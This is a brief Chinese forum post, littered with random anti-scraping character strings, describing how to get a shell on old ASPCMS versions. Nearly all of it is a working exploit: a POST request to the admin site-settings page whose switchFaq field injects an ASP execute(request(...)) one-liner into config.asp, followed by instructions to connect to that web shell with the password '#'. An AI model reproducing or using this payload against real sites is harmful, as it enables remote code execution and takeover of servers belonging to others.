老的ASPCMS版本的秒杀拿SHELL漏洞" x7 t5 G% F7 ?1 p
& {( h$ x: U* s# r2 M 找到后台。。。然后
: ~! A5 @5 P' N; @6 q# o8 n : Z) t1 [ D5 _8 D, u
/admin/_system/AspCms_SiteSetting.asp?action=saves
9 }( N1 n& K% y( l f& u% y9 l4 @6 } + {! W3 S1 H7 q* i } Q+ i9 x4 `
直接POST5 P+ X1 x" ~- T, g& Z: C7 \8 R- X
, J/ [" m/ r: v- O+ FrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1, x w& e* ~$ U2 ^% d. a3 ~
/ d8 z/ R0 c2 C/ D8 s% V) g
再连接配置文件config.asp 密码为#
+ i9 p2 d; D1 c2 p W$ Q |